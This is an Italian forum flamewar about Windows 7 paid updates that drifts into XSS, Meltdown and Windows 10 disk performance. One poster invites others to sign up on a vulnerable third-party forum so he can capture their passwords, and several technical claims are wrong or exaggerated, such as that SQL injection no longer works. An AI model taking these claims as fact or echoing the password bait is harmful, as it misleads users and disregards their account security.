Uomo avvisato, mezzo fottuto :sofico:
ha, ma dimenticavo che io ho AMD :Prrr:
diciamo 1/10 fottuto e 9/10 salvato :D

i siti "seri" (ossia quelli con profitti) da mo che so corsi ai ripari :read:
se non credi a me, leggi qui
https://www.roccobalzama.it/cosa-e-il-cross-site-scripting-xss-e-come-difendersi-da-un-attacco/
l Cross-site scripting (XSS) è una vulnerabilità che affligge siti web dinamici che impiegano un insufficiente controllo dell’input nei form. Un XSS permette ad un Cracker di inserire o eseguire codice lato client al fine di attuare un insieme variegato di attacchi quali ad esempio: raccolta, manipolazione e reindirizzamento di informazioni riservate, visualizzazione e modifica di dati presenti sui server, alterazione del comportamento dinamico delle pagine web ecc.
??? ma non altera solo lato client??:confused:

è un attacco devastante ma che per funzionare necessita di un sito talmente fallato da risultare ridicolo...

se e quando hai tempo qualche dettaglio in più mi farebbe piacere :)

guada che è dal primo momento che sostengo, come ampiamente dimostrato dalla inefficacia dei tuoi attacchi, che le cose che vai blaterando sono fixate da un bel po' e sul campo non funzionano...

XSS è fixato, non il fatto che JAVASCRIPT, da solo, fa i danni...
infatti il metodo per fixare XSS è IMPEDIRE L'uso degli script :read:

ma durante la navigazione su un sito, ciò è semplicemente impossibile..
un sito malevolo non ha bisogno di XSS..esso pubblica il proprio javascript malevolo e sei fottuto :cool:

ecco xchè win7 ormai è una cloaca a cielo aperto (purtroppo)

se e quando hai tempo qualche dettaglio in più mi farebbe piacere :)

oggi l'SQL injection non funge più.. perchè in ogni linguaggio che si rispetti
ci sono delle API che "puliscono" gli input degli utenti..
vedi PreparedStatement in jave, xes. :read:

guada che è dal primo momento che sostengo, come ampiamente dimostrato dalla inefficacia dei tuoi attacchi, che le cose che vai blaterando sono fixate da un bel po' e sul campo non funzionano...

XSS fixato non implica che javascript non sia dannoso :O

@ mally:
facci la cortesia di ignorarlo anche perchè non solo si continua ad alimentare questo OT-sborone ma gli sottrai tempo prezioso per il lavoro (che magari gli paghiamo noi con le tasse etc) :O...

@ mally:
facci la cortesia di ignorarlo anche perchè non solo si continua ad alimentare questo OT-sborone ma gli sottrai tempo prezioso per il lavoro (che magari gli paghiamo noi con le tasse etc) :O...

OT fino a un certo punto, visto che si parla di vulenrabilità devastanti su windows 7, vedi titolo del thread :read:

ha, ma dimenticavo che io ho AMD :Prrr:
diciamo 1/10 fottuto e 9/10 salvato :D

allora già stai più protetto :D

Beh, ma questo hackeraggio? Non si dovevano buttare giù interi forum?

ah, ma allora 7 e 10 non sono uguali?

Torna a lavorare vai che al 99% ti paghiamo noi

Beh, ma questo hackeraggio? Non si dovevano buttare giù interi forum?

avoja, chiedi pure ai ragazzi di promultileague.it :sbonk:
(che da quel momento in poi mi usano come drago rosso a protezione del castello :cool: )

ah, ma allora 7 e 10 non sono uguali?

Torna a lavorare vai che al 99% ti paghiamo noi

ma chi l'ha mai sostenuto che fossero uguali? :mbe:
del resto uno riporta una vers.del kernel, l'altro 2 successive :sbonk:

e invece...
dopo questa lunga dimostrazione della pericolosità di javascript, torniamo IT.. ancora convinti che meltdown non possa distruggervi win7? :ciapet:

avoja, chiedi pure ai ragazzi di promultileague.it :sbonk:
(che da quel momento in poi mi usano come drago rosso a protezione del castello :cool: )

Ti fai pagare il pizzo per la protezione ?
:sofico:

@ mally:
facci la cortesia di ignorarlo anche perchè non solo si continua ad alimentare questo OT-sborone ma gli sottrai tempo prezioso per il lavoro (che magari gli paghiamo noi con le tasse etc) :O...

LOL è vero. Luke vai a lavorà, che il sw di sogei fa schifo!!! :D

dopo questa lunga dimostrazione della pericolosità di javascript, torniamo IT.. ancora convinti che meltdown non possa distruggervi win7? :ciapet:

Ma se non hai fatto letteralmente niente :sbonk:

Ti fai pagare il pizzo per la protezione ?

dici che non sappiano quanto siano fortunati?? :asd:

Mica da tutti in effetti essere sotto l'ala protettrice di personalità del genere :O

We successfully evaluated Meltdown on an up-to-date
Microsoft Windows 10 operating system. In line with
the results on Linux (cf. Section 6.1.1), Meltdown also
can leak arbitrary kernel memory on Windows. This is
not surprising, since Meltdown does not exploit any soft-
ware issues, but is caused by a hardware issue.
In contrast to Linux, Windows does not have the con-
cept of an identity mapping, which linearly maps the
physical memory into the virtual address space. Instead,
a large fraction of the physical memory is mapped in
the paged pools, non-paged pools, and the system cache.
Furthermore, Windows maps the kernel into the address
space of every application too. Thus, Meltdown can read
kernel memory which is mapped in the kernel address
space,
i.e.
, any part of the kernel which is not swapped
out, and any page mapped in the paged and non-paged
pool, and the system cache.

https://www.exploit-db.com/docs/english/43425-meltdown---bypass-intels-hardware-barrier-between-applications-and-the-computers-core-memory.pdf

dopo questa lunga dimostrazione della pericolosità di javascript, torniamo IT.. ancora convinti che meltdown non possa distruggervi win7? :ciapet:
difficile da sfruttare.
win10 invece è certo che mi distrugge la privacy (oltre ad essere brutto e user-unfriendly) :ciapet:

Ma se non hai fatto letteralmente niente :sbonk:

io il sito dove fare le prove ve l'ho dato..
sta a voi farvi un account e aspettare che vi sgami le pass :asd:

difficile da sfruttare.
win10 invece è certo che mi distrugge la privacy (oltre ad essere brutto e user-unfriendly) :ciapet:

difficile? oggi, ora forse, anzi per quanto ne sappiamo..
di sicuro c'è che intel SA come sfruttare la magagna.. e questo basta e avanza :read:

https://www.exploit-db.com/docs/english/43425-meltdown---bypass-intels-hardware-barrier-between-applications-and-the-computers-core-memory.pdf

meglio lin di win, questo è noto. :)

difficile? oggi, ora forse, anzi per quanto ne sappiamo..
di sicuro c'è che intel SA come sfruttare la magagna.. e questo basta e avanza :read:
vabbè, se non ti fidi di intel tout-court, non è che meltdown o non meltdown faccia qualche differenza.

io il sito dove fare le prove ve l'ho dato..
sta a voi farvi un account e aspettare che vi sgami le pass :asd:

Cioè dobbiamo andare NOI a iscriverci su un sito con chissà quali vulnerabilità vecchie di 20 anni per farci sniffare le password e tu saresti il genio dell'informatica? :doh:
Aspetta na, mo ti mando direttamente le password su whatsapp :sbonk:

che poi se hai appena detto che stai curando la sicurezza è implicito che tu abbia accesso da admin, quindi di che attacco stai parlando?!
beh, mica vuol dire. posso benissimo attaccare il mio stesso sito per testare se è a posto. Ovvio che se sono amministratore posso anche accedere direttamente ai dati, ma non è lo scopo del gioco.

se andate in questo sito vi rubbbo la passuord > www.sitodimallyperrubbaregliaccount.it

ma promultileague NON è mio :cool:

Cioè dobbiamo andare NOI a iscriverci su un sito con chissà quali vulnerabilità vecchie di 20 anni per farci sniffare le password e tu saresti il genio dell'informatica? :doh:
boh, a me sapere che ci sono ancora siti con sti buchi m'interessa. Se voi già sapevate tutto, buon per voi.

che poi se hai appena detto che stai curando la sicurezza è implicito che tu abbia accesso da admin, quindi di che attacco stai parlando?!

non ho accesso admin, semplicemente li consiglio..
mica mi serve avere le pass per dirgli di aggiornare ad apache2 piuttosto che non IIS.. :read:

si ma è da eoni che dice di andare direttamente su quel sito specifico, ed ora ci dice che di quel sito gestisce la sicurezza, a pensar male si fa peccato ma a volte ci si azzecca...
io ho capito che ha avvertito i tizi del sito che hanno un problema.
poi sinceramente non m'interessa se qual sito è fallato o no, ma m'interessa che in giro ci sono siti fallati che potrebbero causarmi danni.

anzi, ancor di più m'interessa aver capito che i browser ancor oggi :eek: sono proni a questo tipo di trucchi (tipo chiamare un js in un tag img)... :muro:
davvero pensavo che un po' più di controllo sul codice che gli arriva lo facessero.

hmmm e se al posto dell'avatar qua carico un JS?!? ... :eek:
infettivo per infettivo... :D

boh, a me sapere che ci sono ancora siti con sti buchi m'interessa. Se voi già sapevate tutto, buon per voi.

oltretutto il sito NON ha 20 anni, ma solo 2 :asd:
sti buchi si trovano ancora, basta che il webmaster non sia consapevole :ciapet:

io ho capito che ha avvertito i tizi del sito che hanno un problema.
poi sinceramente non m'interessa se qual sito è fallato o no, ma m'interessa che in giro ci sono siti fallati che potrebbero causarmi danni.

anzi, ancor di più m'interessa aver capito che i browser ancor oggi :eek: sono proni a questo tipo di trucchi (tipo chiamare un js in un tag img)... :muro:
davvero pensavo che un po' più di controllo sul codice che gli arriva lo facessero.

bravo, giusto atteggiamento ;)

bravo, giusto atteggiamento ;)
:cool:

ti odio, m'hai messo delle paranoie... :D

Aspetta na, mo ti mando direttamente le password su whatsapp :sbonk:

Mandagli il virus albanese, l'ho postato giusto ieri perché avevo già capito come si andava a finire :D

Mandagli il virus albanese, l'ho postato giusto ieri perché avevo già capito come si andava a finire :D

io il forum su cui fare le prove l'ho postato :O
aspetto i vs nicks :read:

hmmm e se al posto dell'avatar qua carico un JS?!? ... :eek:
infettivo per infettivo... :D
in effetti la maggior parte dei siti moderni non si limita a trasferire i bytes della foto, ma la copia sul proprio server in binario rimaneggiandola, così se invece di un file binario ci sta un testuale,q uesto perde la sintassi :read:

anche hwupgrade.it fa sto meccanismo

io il forum su cui fare le prove l'ho postato :O
aspetto i vs nicks :read:

Un forum su cui hai detto in qualche modo di collaborare/lavorare. Facciamo che lo creo ora io un forum, ti chiedo di iscriverti e poco dopo so postarti username, password, email e tutti gli altri dati che ti sono stati chiesti chiesti per l'iscrizione?

Naaah perché perdere tutto sto tempo, più comodo il virus albanese... :D

Cut...
Aspetta na, mo ti mando direttamente le password su whatsapp :sbonk:

Io l'ho detto che si impossessava delle vostre password perché gliele avreste date voi per disperazione.

https://www.hwupgrade.it/forum/showpost.php?p=45753720&postcount=365 :read:

Un forum su cui hai detto in qualche modo di collaborare/lavorare. Facciamo che lo creo ora io un forum, ti chiedo di iscriverti e poco dopo so postarti username, password, email e tutti gli altri dati che ti sono stati chiesti chiesti per l'iscrizione?

Naaah perché perdere tutto sto tempo, più comodo il virus albanese... :D

se mi tiri su una form html pura con db che stora le password hashate, per me va benissimo :read:

ehm..cough..
https://www.hwupgrade.it/articoli/sicurezza-software/5235/foreshadow-e-foreshadow-ng-nuove-vulnerabilita-dopo-meltdown-e-spectre-per-le-cpu-intel_index.html
:read: :cool:

ehm..cough..
https://www.hwupgrade.it/articoli/sicurezza-software/5235/foreshadow-e-foreshadow-ng-nuove-vulnerabilita-dopo-meltdown-e-spectre-per-le-cpu-intel_index.html
:read: :cool:


Ben svegliato, un caffettino?

pubblicato il 16 Agosto 2018 nel canale Sicurezza

Vedo che ti tieni bene aggiornato :D

ehm..cough..
https://www.hwupgrade.it/articoli/sicurezza-software/5235/foreshadow-e-foreshadow-ng-nuove-vulnerabilita-dopo-meltdown-e-spectre-per-le-cpu-intel_index.html
:read: :cool:

solo intel. :O

Ben svegliato, un caffettino?

pubblicato il 16 Agosto 2018 nel canale Sicurezza

Vedo che ti tieni bene aggiornato :D

16 Agosto è ieri, anzi è mai per i possessori di windows 7 :sofico:

16 Agosto è ieri :sofico:
Ieri era il 16 Settembre !

ho preso una recente notiziona di bug devastanti, come riprova degli exploit che circolano in seguito alla diffusione di Spectre e Meltdown :read:
exploit che è bene ricordare non saranno mai mitigati sotto windows 7 :O

;45747349']Allucinante... un conto è che togli gli update, ok tua decisione.
Ma che li lasci se paghi... ridicolo.

è una chiara mossa commerciale per assicurarsi il definitivo e totale passaggio a Windows10.

è una chiara mossa commerciale per assicurarsi il definitivo e totale passaggio a Windows10.

Per quello non c'è problema. Più o meno con imposizioni e trucchetti vari (ricordo la perenne ricerca degli aggiornamenti di windows 7 che mandavano in loop tutto il sistema ad esempio) chi non voleva fare il passaggio, comunque alla fine ha piegato la testa.
La mossa è più che altro per evitare una sorta di "sommossa" da parte di molte aziende. Se ho macchinari che girano con windows 7, è più conveniente per me pagare gli aggiornamenti piuttosto che ribaltare un intero impianto di produzione con tutte le problematiche del caso dovute ai mancati introiti per i fermo macchina.

Per quello non c'è problema. Più o meno con imposizioni e trucchetti vari (ricordo la perenne ricerca degli aggiornamenti di windows 7 che mandavano in loop tutto il sistema ad esempio) chi non voleva fare il passaggio, comunque alla fine ha piegato la testa.
La mossa è più che altro per evitare una sorta di "sommossa" da parte di molte aziende. Se ho macchinari che girano con windows 7, è più conveniente per me pagare gli aggiornamenti piuttosto che ribaltare un intero impianto di produzione con tutte le problematiche del caso dovute ai mancati introiti per i fermo macchina.

eh ma devono stare attenti perchè con windows 10 gli HDD vanno utilizzati solo come storage, perchè il disco che ospiterà la %WINDIR% dovrà essere necessariamente SSD :read:

eh ma devono stare attenti perchè con windows 10 gli HDD vanno utilizzati solo come storage, perchè il disco che ospiterà la %WINDIR% dovrà essere necessariamente SSD :read:

Uno bene o male lo si gestisce, ma alex + lukeilbello, è troppo per chiunque!

Uno bene o male lo si gestisce, ma alex + lukeilbello, è troppo per chiunque!

Questa non è missione difficile, è missione impossibile. Difficile è una passeggiata per te. Cit.

eh ma devono stare attenti perchè con windows 10 gli HDD vanno utilizzati solo come storage, perchè il disco che ospiterà la %WINDIR% dovrà essere necessariamente SSD :read:

Quello lo ritengo il meno dei problemi.
Ci deve girare il sistema operativo e il programma di automazione che fa funzionare la macchina.
Di certo, non ci carichi sopra i selfie delle vacanze.

Quello lo ritengo il meno dei problemi.
Ci deve girare il sistema operativo e il programma di automazione che fa funzionare la macchina.
Di certo, non ci carichi sopra i selfie delle vacanze.

Perché, se ci carichi i selfie delle vacanze gli hard disk non vanno bene?

Uno bene o male lo si gestisce, ma alex + lukeilbello, è troppo per chiunque!

io parlavo dei dischi non del superadmin :D

Perché, se ci carichi i selfie delle vacanze gli hard disk non vanno bene?

Dont feed the troll...

Dont feed the troll...

E lo dici a me proprio tu? :D

E lo dici a me proprio tu? :D

Appunto !
Chi meglio di me li riconosce ?

Appunto !
Chi meglio di me li nutre ?

/Fixed

/Fixed

:asd:
bisogna riconoscere però che il trasformismo di Alex è superiore a quello di Mandrake :sofico:

Perché, se ci carichi i selfie delle vacanze gli hard disk non vanno bene?

Parlavo di PC che gestisce un eventuale impianto automazione dove fai upgrade da 7 a windows 10 sostituendo l'HD con SSD.
Su una macchina del genere usi l'SSD per caricarci le foto delle vacanze? :mbe:

edit:
Fa niente..vedo che non c'è interesse a discutere seriamente...

Parlavo di PC che gestisce un eventuale impianto automazione dove fai upgrade da 7 a windows 10 sostituendo l'HD con SSD.
Su una macchina del genere usi l'SSD per caricarci le foto delle vacanze? :mbe:

Ma perché devi sostituire l'HD con l'SSD in una macchina del genere?

Chi ti capisce deve essere uno molto bravo :)

Ma chi se ne frega di quale è il dispositivo di storage? Windows 10 funziona perfettamente sia con l'HD tradizionale che con gli SSD, ste menate da dove vi vengono fuori?

Ma perché devi sostituire l'HD con l'SSD in una macchina del genere?
Chi ti capisce deve essere uno molto bravo :)


Non sbagliavo quando dicevo che non c'è l'interesse a discuterne seriamente...

Non sbagliavo quando dicevo che non c'è l'interesse a discuterne seriamente...

Vuoi discuterne seriamente? OK.

La domanda mi pare chiara nella sua serietà: Ma perché devi sostituire l'HD con l'SSD in una macchina del genere?

Rispondere seriamente, grazie.

Ma perché devi sostituire l'HD con l'SSD in una macchina del genere?

Chi ti capisce deve essere uno molto bravo :)

Ma chi se ne frega di quale è il dispositivo di storage? Windows 10 funziona perfettamente sia con l'HD tradizionale che con gli SSD, ste menate da dove vi vengono fuori?
se perfettamente intendi con gli stessi tempi degli altri OSes, ciò che afferrni è falso :read:

Vuoi discuterne seriamente? OK.

La domanda mi pare chiara: Ma perché devi sostituire l'HD con l'SSD in una macchina del genere?

Rispondere seriamente, grazie.

perchè con un disco meccanico windows 10, tra superfetch, cortana, ottimizzazione avvio, windefender e windows update che vive di vita propria, lanciandosi da solo magari mentre stai lavorando, si pianta che è un (dis)piacere :muro:

questa direi che è l'unica verità che anche i fanboys più conclamati riconoscono :read:

se perfettamente intendi con gli stessi tempi degli altri OSes, ciò che afferrni è falso :read:

I tempi con l'SSD sono sempre migliori rispetto agli HD a prescindere dal sistema operativo. È un sensibilissimo incremento di prestazioni hardware.


Torniamo a noi, serve misurare i tempi in macchine del genere? Cito testualmente:

"PC che gestisce un eventuale impianto automazione"

Rispondere seriamente, grazie.

:sofico:

perchè con un disco meccanico windows 10, tra superfetch, cortana, ottimizzazione avvio, windefender e windows update che vive di vita propria, lanciandosi da solo magari mentre stai lavorando, si pianta che è un (dis)piacere :muro:

Perché un bel fico secco mi consenta (cit.):

https://i.imgur.com/Pz5RgxS.png

Due hard disk tradizionali seagate, neppure tanto nuovi (uno è del 2011), non si pianta mai Windows 10.


questa direi che è l'unica verità


L'unica verità che si capisce è che tu Windows 10 non l'hai mai usato con dischi tradizionali e probabilmente mai usato tout court.

I tempi con l'SSD sono sempre migliori rispetto agli HD a prescindere dal sistema operativo. È un sensibilissimo incremento di prestazioni hardware.


Torniamo a noi, serve misurare i tempi in macchine del genere? Cito testualmente:

"PC che gestisce un eventuale impianto automazione"

Verissimo quanto affermi, però io con windows 7 su HDD avvio in 6-7 secs..
con windows 10 su HDD ne metto il triplo... :read:

Perché un bel fico secco mi consenta (cit.):

https://i.imgur.com/Pz5RgxS.png

Due hard disk tradizionali seagate, neppure tanto nuovi (uno è del 2011), non si pianta mai Windows 10.




L'unica verità che si capisce è che tu Windows 10 non l'hai mai usato con dischi tradizionali e probabilmente mai usato tout court.

veramente ho 2 versioni, una sul portatile di ufficio, una a casa (vedi signa)
sorry for you :read: :read:

comnque nei thread passati ho ampiamente pubblicato i tempi indecorosi su HDD, vista l'ampia documentazione riportata (con tanto di screenshot e parolacce varie :D )e soprattutto dopo essere stato ammonito dai mods a non scrivere più di dischi, mi fermo subito :ciapet:

per concludere sappi caro Nicodemo che windows 10, sotto HDD, fa cagare a spruzzo :sofico:

detto da uno che lo possiede e usa da 2 anni (25 mesi) :read:

Verissimo quanto affermi, però io con windows 7 su HDD avvio in 6-7 secs..
con windows 10 su HDD ne metto il triplo... :read:

Tu? Non mi stupisce :O In ogni caso la domanda (serissima sennò Alex Haverich non risponde) resta sempre quella: serve misurare i tempi in macchine del genere?



veramente ho 2 versioni, una sul portatile di ufficio, una a casa (vedi signa)
sorry for you :read: :read:

Il che rende le tue affermazioni ancora più gravi... :read: :D

Verissimo quanto affermi, però io con windows 7 su HDD avvio in 6-7 secs..
con windows 10 su HDD ne metto il triplo... :read:

Come no...anche 2-3 secondi scommetto. :D Guarda, ho assemblato decine e decine di configurazioni con Windows 7 e dischi tradizionali, WD Raptor compresi...
dai perfavore non spariamole troppo grosse, su, poi se te lo hanno detto anche i mod...:rolleyes:

comnque nei thread passati ho ampiamente pubblicato i tempi indecorosi su HDD, vista l'ampia documentazione riportata (con tanto di screenshot e parolacce varie :D )e soprattutto dopo essere stato ammonito dai mods a non scrivere più di dischi, mi fermo subito :ciapet:

Da me non è indecoroso per queste cose, e siccome non mi ritengo un miracolato, direi che o c'è esagerazione da parte tua, o su quei PC combini qualche fesseria per ridurre Windows 10 in quello stato.

Semmai di indecoroso c'è dell'altro in Windows 10, IMHO.

Vuoi discuterne seriamente? OK.

Rispondere seriamente, grazie.

:asd: mi sa che chiedi troppo..

Vorrei chiedere una cosa ai Moderatori. E' possibile che un signore come Luke il Bello possa portare sempre e continuamente la discussione Off Topic grazie ai suoi Hard Disk e ai tempi di caricamento?
Mi sembra che l'oggetto di discussione sia altro, credo che ogni tanto richiamare i Troll sia doveroso..

Vorrei chiedere anche un'altra cosa più seria:
Sono l'unico che rispetta il regolamento del Forum secondo cui un Utente Bannato non ha più diritto di iscriversi in questo Forum?
Com'è possibile che il solito Alex aka Haverick sia sempre qui fregandosene altamente dei regolamenti? Ha un salvacondotto? se ne frega altamente dei regolamenti? (si questo è chiaro, lui fa parte dell'esercito, mica pizze)
Se questo è lo stile del Forum mi chiedo a che servano i regolamenti....

In attesa della risposta torno nel mio limbo dei Bannati pensando ancora che le regole valgano qualcosa...
Buona continuazione...

:
Com'è possibile che il solito Alex aka Haverick sia sempre qui fregandosene altamente dei regolamenti?

Ed importuna pure in mail privata. Ho appena ricevuto una sua con la "minaccia" di essere messo nella sua ignore list :D

Non dormirò le prossime notti per la paura...


Per tornare in topic, non ci vedo nulla di straordinario o criticabile in quello che sta facendo MS. Più di dieci anni di supporto gratuito li ha offerti per 7, se qualcuno ne vuole ancora è logico che debba accollarsene almeno in parte le spese. È stato fatto anche con versioni precedenti di Windows e lo sarà anche in futuro presumo, è un business anche questo.

Ed importuna pure in mail privata.

Mi spiace, ma io non ti ho importunato ma semplicemente "invitato" a chiamarmi con il mio NickName.
Oltre a questo, ti ho spiegato chiaramente perché in un impianto di automazione andrebbe usato un più moderno SSD, ribadendo il fatto che io da nessuna parte qua dentro ho mai parlato di tempi di boot, ma come immaginavo non sei assolutamente interessato a quello che chiedi ma a tutt'altro.
Semmai ci sarebbe da fare un discorsetto sulla tua risposta, che ha toni tutt'altro che cordiali ma glissiamo.

Detto questo, ribadisco il mio precedente messaggio che ho scritto, perfettamente in tema con l'oggetto della news:

La mossa è più che altro per evitare una sorta di "sommossa" da parte di molte aziende. Se ho macchinari che girano con windows 7, è più conveniente per me pagare gli aggiornamenti piuttosto che ribaltare un intero impianto di produzione con tutte le problematiche del caso dovute ai mancati introiti per i fermo macchina.

E sottolineo nuovamente il fatto che, da parte di qualcuno, non c'è la volontà a discuterne in modo serio.
Buona giornata.

Mi spiace, ma io non ti ho importunato ma semplicemente "invitato" a chiamarmi con il mio NickName.

Mi hai importunato minacciandomi delle estreme conseguenze, l'invasione della Polonia...ops l'ignore list :) Ti rendi conto di quanto sei ridicolo a minacciare via email privata?

I nickname li cambi tu ogni due per tre riregistrandoti, te ne assumi le conseguenze!


Oltre a questo, ti ho spiegato chiaramente perché in un impianto di automazione andrebbe usato un più moderno SSD, ribadendo il fatto che io da nessuna parte qua dentro ho mai parlato di tempi di boot, ma come immaginavo non sei assolutamente interessato a quello che chiedi ma a tutt'altro.

Non hai spiegato alcunché, solo blaterato sciocchezze che per rispetto della privacy evito di copio-incollare. Se mi autorizzi posso farlo, ma non so quanto ti conviene.

E resta ancora da capire perché su un computer che gestisce in impianto di automazione attualmente con 7, passandolo a Windows 10 andrebbe usato un SSD invece di un hard disk. Continui a non dirlo o non spiegarlo.


Semmai ci sarebbe da fare un discorsetto sulla tua risposta, che ha toni tutt'altro che cordiali ma glissiamo.


Vorresti pure essere trattato cordialmente dopo aver importunato?


Detto questo chiudo qui ogni su quest'argomento, il prossimo post che fai non attinente all'argomento della discussione verrà immediatamente segnalato alla moderazione e vedremo se ti viene segato anche quest'account.

Non hai spiegato alcunché, solo blaterato sciocchezze che per rispetto della privacy evito di copio-incollare.
Io ti avevo avvisato...

E resta ancora da capire perché su un computer che gestisce in impianto di automazione attualmente con 7, passandolo a Windows 10 andrebbe usato un SSD invece di un hard disk. Continui a non dirlo o non spiegarlo.


Arrivaci da solo.
Io un indizio nel mio mess. PVT te l'ho dato..;)

Vorresti pure essere trattato cordialmente dopo aver importunato?

Non ti ho importunato, ma invitato a chiamarmi con il mio NickName.
Io non mi chiamo Alex Haverich.
Grazie.

Io non mi chiamo Alex Haverich.
Grazie.Ciao Adapter :read:
Vediamo che i 50 ban non ti son bastati, ne attendiamo un ennesimo con ansia.

sinceramente avete stufato

Arrivaci da solo.
Io un indizio nel mio mess. PVT te l'ho dato..;)

Un indizio? ROTFL, siamo ai soliti ignoti o su un forum in cui si discute di tecnologia? :D

E comunque non hai dato alcun indizio in privato esattamente come in pubblico continui a non saper spiegare perché un computer con windows 7 e che "gestisce un impianto di automazione" (tua cit.) e che viene passato a Windows 10, debba avere per forza cambiato anche l'hard disk sostituendolo con uno SSD.

La domanda è semplice semplice: perché????

La risposta non arriva, eppure volevi discutere seriamente avevi detto. Tutta qui la tua serietà? Solo tanta fuffa e niente di concreto?



Non ti ho importunato, ma invitato a chiamarmi con il mio NickName.
Io non mi chiamo Alex Haverich.


Non è un nome, è un nickname. Così come le decinaia di nickname che usi continuamente per riregistrarti nel forum:

https://www.hwupgrade.it/forum/showpost.php?p=45102467&postcount=302

Ti chiamo come mi pare, tanto un nickname certo non ce l'hai.

sinceramente avete stufato

Eh, da un pezzo ormai...
Vien voglia di iscriversi ad un altro forum e abbandonare questo.
Non fosse per l'aspetto nostalgico...

La domanda è semplice semplice: perché????



https://www.drivereasy.com/knowledge/100-disk-usage-windows-10-fixed/
qui addirittura la Microsoft cerca di arginare la grossa empasse :asd:
https://answers.microsoft.com/en-us/windows/forum/windows_10-performance/windows-10-constant-hard-drive-activity/ca5b0ed0-6551-41bb-a969-e644d0786554

E comunque non hai dato alcun indizio in privato esattamente come in pubblico continui a non saper spiegare perché un computer con windows 7 e che "gestisce un impianto di automazione" (tua cit.) e che viene passato a Windows 10, debba avere per forza cambiato anche l'hard disk sostituendolo con uno SSD.


Te l'ho dato invece, se non ci arrivi da solo io non posso farci nulla. :boh:
Proprio per evitare di sporcare e dar fastidio ad altri utenti te l'ho dato in PVT.
Ora non mi metto a spiegarti cose ovvie, sopratutto in considerazione del fatto che continui ad avere un atteggiamento "poco consono" ad una civile discussione. ;)

https://www.drivereasy.com/knowledge/100-disk-usage-windows-10-fixed/
qui addirittura la Microsoft cerca di arginare la grossa empasse :asd:
https://answers.microsoft.com/en-us/windows/forum/windows_10-performance/windows-10-constant-hard-drive-activity/ca5b0ed0-6551-41bb-a969-e644d0786554


Link di un anno fa uno e l'altro del 2015 che inizia con

"If your Windows 10 Task Manager shows 100% disk usage, something is causing your hard drive to over-work."

Se il task manager mostra, non il task manger mostra sempre. Grazie, i malfunzionamenti dei computer esistono da quando li hanno inventati, non vuol dire che devono sempre essere malfunzionanti. Non vedo scritto da nessuna parte lì dentro che i computer con 10 devono necessariamente avere l'SSD. Anzi la parola SSD non è nemmeno scritta lì dentro. Link del tutto inutile, totalmente sbagliato riportarlo in questo contesto.

Vale lo stesso per il secondo che tra l'altro al contrario di quello che dici non è Microsoft ma una comunity di Microsoft, immagino dovrei anche spiegarti la differenza... :D E dovrei immagino anche spiegarti che se vai in un qualsiasi negozio di personal computer l'80/90% dei PC in vendita sono con Windows 10 ed ancora hard disk tradizionali, sostanzialmente venderebbero tutti delle sole pazzesche, un megaimbroglio mondiale ai danni del consumatore che riceverebbe della macchine malfunzionanti già in partenza.

Ma perché piuttosto non scrivi qualcosa tu in italiano e con linguaggio semplice per un sempliciotto come me che ha diverse macchine con 10 su HD tradizionale e su nessuna si è verificato quello lì mostrato? Puoi scrivere sotto la riga sia mai che non sai da dove iniziare, la domanda la sai già mal che vada la rileggi poco sotto. Ecco la riga, scrivi sotto.

-------------------------------------



Te l'ho dato invece, se non ci arrivi da solo io non posso farci nulla. :boh:
Proprio per evitare di sporcare e dar fastidio ad altri utenti te l'ho dato in PVT.

Non mi hai detto nulla in privato così come nulla stai dicendo in pubblico. In ogni caso questo è un forum ad accesso pubblico non c'è motivo per dirmi in privato cose che puoi scrivere pubblicamente e quindi essere di utilità per tutti quelli che accedono al forum. Click dai motori di ricerca compresi.

Ora non mi metto a spiegarti cose ovvie, sopratutto in considerazione del fatto che continui ad avere un atteggiamento "poco consono" ad una civile discussione. ;)

Anche tu tanto blablabla, blebleble, blublublu, e sotto e sopra, e destro e sinistra, e dentro e fuori, e a destra e a sinistra, e così e colà... ma una semplice, chiara, in italiano comprensibile, risposta alla domanda elementare sul perché su un computer che "gestisce un impianto di automazione" (tua cit.), che ha 7 e viene passato a 10 si deve anche cambaire lhard disk con uno SSD, non l'hai ancora data.

Anche per te, ti facilito indicandoti dove scriverla sta benedetta risposta. Da sotto la riga, grazie.

-------------------------------------

Tenere testa ad alex e luke, non è cosa da tutti, onore e rispetto !
:ave:

Tenere testa ad alex e luke, non è cosa da tutti, onore e rispetto !
:ave:
:asd:
in effetti non è da me.. ma è in vantaggio perchè non posso parlare direttamente di HDD, ho ricevuto un ammonizione dal mod e non intendo farmi cacciare per dimostrare che l'acqua è bagnata dopo N dimostrazioni tutte equivalenti (capisco i mods) :ciapet:
il tutto per dimostrare l'acqua calda, ciò che sanno tutti, cioè che win10 su HDD va male :read:

inutile postare stamp personali.. "non vale sei di parte!" (come se mi pagasse linus torvalds o STallman per sputtanare la concorrenza :sofico: )
inutile postare forum in cui gente elemosina aiuti contro la testina del proprio HDD... "non vale! è di 3 anni fa" (come win10 fosse migliorato nel frattempo grazie ad un SP :sbonk: )
inutile, addirittura, postare link diretti dal sito microsoft :asd: lì addirittura mirrorclimbing estremo, giacchè il sito non è MS bensì della COMMUNITY di MS :sbonk: (peccato che il sito sia microsoft.com :sofico: )

vediamo se il buon Alex, che non credo abbia ricevuto dinieghi in tal senso, riuscirà ad avere la meglio :read:
edit: come non detto, Alex è tornato banned :banned: :cry:

quindi se vai in un qualsiasi negozio di personal computer l'80/90% dei PC in vendita sono con Windows 10 ed ancora hard disk tradizionali, sostanzialmente venderebbero tutti delle sole pazzesche, un megaimbroglio mondiale ai danni del consumatore che riceverebbe della macchine malfunzionanti già in partenza.
si, esattamente come successe 12 anni fa, ovvero con win Vista :read:
che non lo comprava per sbaglio neanche la mamma di zio bill :sbonk:
motivi? gli stessi di ora, HDD in palla :ciapet:


O VOGLIAMO NEGARE ANCHE LO SCANDALO WIN VISTA... :mbe:
è già successo 12 anni fa, e sta risuccedendo adesso, che ormai gli SSD te li tirano dietro e quindi chissenefrega se l'hdd meccanico si inchioda :fagiano:

il tutto per dimostrare l'acqua calda, ciò che sanno tutti, cioè che win10 su HDD va male :read:
Su hd come su ssd W10 è un cannone :)

Su hd come su ssd W10 è un cannone :)

si anche io dopo averlo fumato ho le tue sensazioni.. :sbonk:
poi da lucido, al mattino quando accendo il portatile che si inchioda, ho tutt'altre impressioni :read:

che ci si deve fare gente, i forum sono questi...e cioè a tratti ridicoli :asd:

si anche io dopo averlo fumato ho le tue sensazioni.. :sbonk:
poi da lucido, al mattino quando accendo il portatile che si inchioda, ho tutt'altre impressioni :read:
